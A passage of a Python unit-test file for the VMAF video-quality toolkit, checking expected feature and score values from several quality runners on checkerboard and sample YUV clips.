self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale0_score'], 0.23738393128710478, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale1_score'], 0.08524788663335138, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale2_score'], 0.024058909404945077, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale3_score'], 0.018034879735107798, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 32.757433750978919, places=4)
def test_run_vmaf_runner_with_transform_score_2(self):
print 'test on running VMAF runner with score transforming (2)...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'model_filepath': VmafConfig.test_resource_path("test_model_transform_add40_outltein.pkl"),
'enable_transform_score': True,
'disable_clip_score': True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale0_score'], 0.23738393128710478, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale1_score'], 0.08524788663335138, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale2_score'], 0.024058909404945077, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale3_score'], 0.018034879735107798, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], -7.2425662490210838, places=4)
def test_run_vmaf_runner_with_transform_score_disabled(self):
print 'test on running VMAF runner with score transforming disabled...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'model_filepath': VmafConfig.test_resource_path("test_model_transform_add40.pkl"),
'enable_transform_score': False,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale0_score'], 0.23738393128710478, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale1_score'], 0.08524788663335138, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale2_score'], 0.024058909404945077, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale3_score'], 0.018034879735107798, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 0.0, places=4)
def test_run_vmaf_runner_with_transform_for_phone(self):
print 'test on running VMAF runner with transform for phone...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'enable_transform_score': True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.053996580527295335, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 14.982837886251568, places=4)
def test_run_vmafossexec_runner_with_transform_score(self):
print 'test on running VMAFOSSEXEC runner with score transforming...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafossExecQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'model_filepath': VmafConfig.test_resource_path("test_model_transform_add40.pkl"),
'enable_transform_score': True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale0_score'], 0.23738393128710478, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale1_score'], 0.08524788663335138, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale2_score'], 0.024058909404945077, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale3_score'], 0.018034879735107798, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 32.757433333333331, places=4)
def test_run_vmafossexec_runner_with_transform_score_2(self):
print 'test on running VMAFOSSEXEC runner with score transforming...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafossExecQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'model_filepath': VmafConfig.test_resource_path("test_model_transform_add40_outltein.pkl"),
'enable_transform_score': True,
'disable_clip_score': True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale0_score'], 0.23738393128710478, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale1_score'], 0.08524788663335138, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale2_score'], 0.024058909404945077, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale3_score'], 0.018034879735107798, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], -7.2425766666666673, places=4)
def test_run_vmafossexec_runner_with_transform_score_disabled(self):
print 'test on running VMAFOSSEXEC runner with score transforming disabled...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafossExecQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'model_filepath':VmafConfig.test_resource_path("test_model_transform_add40.pkl"),
'enable_transform_score':False,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale0_score'], 0.23738393128710478, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale1_score'], 0.08524788663335138, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale2_score'], 0.024058909404945077, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale3_score'], 0.018034879735107798, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 0.0, places=4)
def test_run_vmafossexec_runner_with_transform_for_phone(self):
print 'test on running VMAFOSSEXEC runner with transform for phone...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafossExecQualityRunner(
[asset],
None, fifo_mode=False,
delete_workdir=True,
optional_dict={
'enable_transform_score':True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.053996566666666669, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 14.982840000000001, places=4)
def test_run_vmafossexec_runner_with_phone_model(self):
print 'test on running VMAFOSSEXEC runner with transform for phone...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafossExecQualityRunner(
[asset],
None, fifo_mode=False,
delete_workdir=True,
optional_dict={
'phone_model':True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.053996566666666669, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 14.982840000000001, places=4)
def test_run_vmafossexec_runner_disable_avx_precise(self):
print 'test on running VMAFOSSEXEC runner disabling AVX (precise)...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={'disable_avx': True}
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'],0.363420458333, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.766647520833, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.862854708333, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.915971791667, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 3.8953527083333337, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.93458777083333333, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_psnr_score'], 30.7550666667, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ssim_score'], 0.86322654166666657, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ms_ssim_score'], 0.96324068749999991, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale0_score'], 1.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale1_score'],0.999999958333, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale2_score'],0.999999416667, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale3_score'], 0.999999208333, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion2_score'], 3.8953527083333337, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_adm2_score'], 1.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_psnr_score'], 60.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ssim_score'], 1.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ms_ssim_score'], 1.0, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.699306249999992, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 99.946416666666664, places=5)
def test_run_vmafossexec_runner_enable_avx_precise(self):
print 'test on running VMAFOSSEXEC runner enabling AVX (precise)...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'],0.36342081250000002, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.76664741666666669, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.86285333333333336, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.91597195833333345, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 3.8953527083333337, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.93458777083333333, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_psnr_score'], 30.7550666667, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ssim_score'], 0.86322654166666657, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ms_ssim_score'], 0.96324068749999991, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale0_score'], 1.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale1_score'],0.99999985416666659, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale2_score'],0.99999960416666667, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale3_score'], 0.99999914583333338, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion2_score'], 3.8953527083333337, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_adm2_score'], 1.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_psnr_score'], 60.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ssim_score'], 1.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ms_ssim_score'], 1.0, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.699266666666674, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 99.946416666666664, places=5)
def test_run_vmafossexec_runner_with_motion2(self):
print 'test on running VMAFOSSEXEC runner with motion2 feature...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath':VmafConfig.test_resource_path("test_motion2.pkl")
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion_score'], 4.04982583333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 3.8953522916666672, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion_score'], 4.04982583333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion2_score'], 3.8953522916666672, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 78.532525000000007, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 97.089554166666673, places=4)
def test_run_bootstrap_vmaf_runner(self):
print 'test on running bootstrap VMAF runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = BootstrapVmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath':VmafConfig.test_resource_path('model', 'vmafplus_v0.5.2boot_test.pkl'),
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.766647542135, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.862854666902, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.915971778036, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.93458780728708746, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.00000001415, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'],0.99999972612, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 0.999999465724, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 0.999999399683, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_score'], 75.44304862545658, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_score'], 99.95804893252175, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_bagging_score'], 75.13012623785923, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_bagging_score'], 99.96504855577571, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_stddev_score'], 0.6812993325967104, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_stddev_score'], 0.03947607207290399, places=4)
def test_run_bootstrap_vmaf_runner_with_transform_score(self):
print 'test on running bootstrap VMAF runner with transform score...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = BootstrapVmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath':VmafConfig.test_resource_path('model', 'vmafplus_v0.5.2boot_test.pkl'),
'enable_transform_score': True,
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_score'], 91.72301218903131, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_score'], 100.0, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_bagging_score'], 91.51430018402004, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_bagging_score'], 100.0, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_stddev_score'], 0.4605056702850125, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_stddev_score'], 0.0, places=10)
def test_run_bootstrap_vmaf_runner_10models(self):
print 'test on running bootstrap VMAF runner with 10 models...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = BootstrapVmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath':VmafConfig.test_resource_path('model', 'vmafplus_v0.5.2boot_test2.pkl'),
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_score'], 75.44304862545658, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_score'], 99.95804893252175, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_bagging_score'], 75.16984256068905, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_bagging_score'], 99.9640738745435, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_stddev_score'], 1.4162722210107226, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_stddev_score'], 0.03321535846597722, places=4)
def test_run_bagging_vmaf_runner(self):
print 'test on running bagging VMAF runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = BaggingVmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath':VmafConfig.test_resource_path('model', 'vmafplus_v0.5.2boot_test.pkl'),
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.766647542135, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.862854666902, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.915971778036, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.93458780728708746, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.00000001415, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'],0.99999972612, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 0.999999465724, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 0.999999399683, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_score'], 75.130125465736413, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_score'], 99.965048555775709, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_bagging_score'], 75.13012623785923, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_bagging_score'], 99.96504855577571, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_stddev_score'], 0.6812993325967104, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_stddev_score'], 0.03947607207290399, places=4)
def test_run_niqe_runner(self):
print 'test on running NIQE runner on images...'
ref1_path = VmafConfig.test_resource_path("test_image_yuv", "100007.yuv")
ref2_path = VmafConfig.test_resource_path("test_image_yuv", "100039.yuv")
asset1 = NorefAsset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
dis_path=ref1_path,
asset_dict={'width':481, 'height':321, 'yuv_type':'yuv444p'})
asset2 = NorefAsset(dataset="test", content_id=0, asset_id=1,
workdir_root=VmafConfig.workdir_path(),
dis_path=ref2_path,
asset_dict={'width':481, 'height':321, 'yuv_type':'yuv444p'})
self.runner = NiqeQualityRunner(
[asset1, asset2],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['NIQE_score'], 4.8656072348129422, places=4)
self.assertAlmostEqual(results[1]['NIQE_score'], 2.9309929860778756, places=2)
class ParallelQualityRunnerTest(unittest.TestCase):
def setUp(self):
self.result_store = FileSystemResultStore()
def tearDown(self):
if hasattr(self, 'runners'):
for runner in self.runners:
runner.remove_results()
pass
def test_run_parallel_vmaf_legacy_runner(self):
print 'test on running VMAF (legacy) quality runner in parallel...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafLegacyQualityRunner(
[asset, asset_original, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'], 0.4460930625000001, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.509571520833337, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.271439270833337, places=4)
self.assertAlmostEqual(results[0]['VMAF_legacy_score'], 65.393758021816708, places=4)
self.assertAlmostEqual(results[1]['VMAF_legacy_score'], 96.444658329804156, places=4)
self.assertAlmostEqual(results[2]['VMAF_legacy_score'], 96.444658329804156, places=4)
def test_run_parallel_vmaf_runner(self):
print 'test on running VMAF quality runner in parallel...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original, asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.766647542135, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.862854666902, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.915971778036, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.00000001415, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'],0.99999972612, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 0.999999465724, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 0.999999399683, places=4)
